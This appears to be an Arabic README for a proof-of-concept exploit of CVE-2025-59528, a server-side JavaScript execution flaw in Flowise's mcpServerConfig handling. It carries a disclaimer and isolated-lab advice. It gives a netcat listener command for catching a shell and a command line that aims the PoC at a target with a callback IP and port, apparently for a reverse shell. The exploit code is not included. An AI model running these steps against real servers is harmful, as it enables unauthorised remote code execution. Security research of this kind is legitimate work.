
The poc of CVE-2025-59528
إثبات المفهوم (PoC) لدراسة CVE-2025-59528 في بيئة مختبرية معزولة.
[!WARNING] إخلاء المسؤولية
هذا المشروع مخصص حصريًا للأغراض التعليمية، والبحث الأمني، واختبار الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
لا تستخدم إثبات المفهوم هذا ضد خوادم تابعة لجهات خارجية، أو خدمات عامة، أو بنية تحتية دون إذن المالك.
ليس المؤلف مسؤولًا عن أي ضرر، أو فقدان بيانات، أو انقطاع خدمة، أو عواقب قانونية ناتجة عن إساءة استخدام هذا المشروع.
يوضح إثبات المفهوم هذا التأثير المحتمل للثغرة CVE-2025-59528، وهي ثغرة تتعلق بمعالجة mcpServerConfig الذي يتحكم فيه المستخدم في Flowise.
في ظل ظروف معينة، قد تسمح الثغرة للمهاجم بتنفيذ كود JavaScript عشوائي على جانب الخادم.
تحقق دائمًا من الإصدار الدقيق للتثبيت المستهدف قبل الاختبار.
requestsثبّت تبعية Python:
pip install requests
شغّل netcat للحصول على شل:
nc -lvnp <YOUR_PORT>
شغّل إثبات المفهوم باستخدام:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
يجب إجراء الاختبار داخل شبكة افتراضية أو مختبرية معزولة.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
لا تقم بتعريض نسخة Flowise المعرّضة للثغرة عمدًا للإنترنت العام مباشرة.
إذا كنت تشغّل إصدارًا متأثرًا من Flowise:
باستخدامك لهذا المشروع، فإنك تقرّ بأنك المسؤول الوحيد عن الامتثال لجميع القوانين واللوائح المعمول بها.
استخدم إثبات المفهوم هذا فقط ضد الأنظمة التي تملكها أو الأنظمة التي لديك إذن صريح لإجراء اختبارات أمنية عليها.
| الوسيط | الوصف |
|---|
-t, --target | عنوان URL لنسخة اختبار Flowise |
-o, --api_key | مفتاح API |
-i, --ip | عنوان IP لجهاز الاختبار |
-p, --port | المنفذ المستخدم في بيئة الاختبار |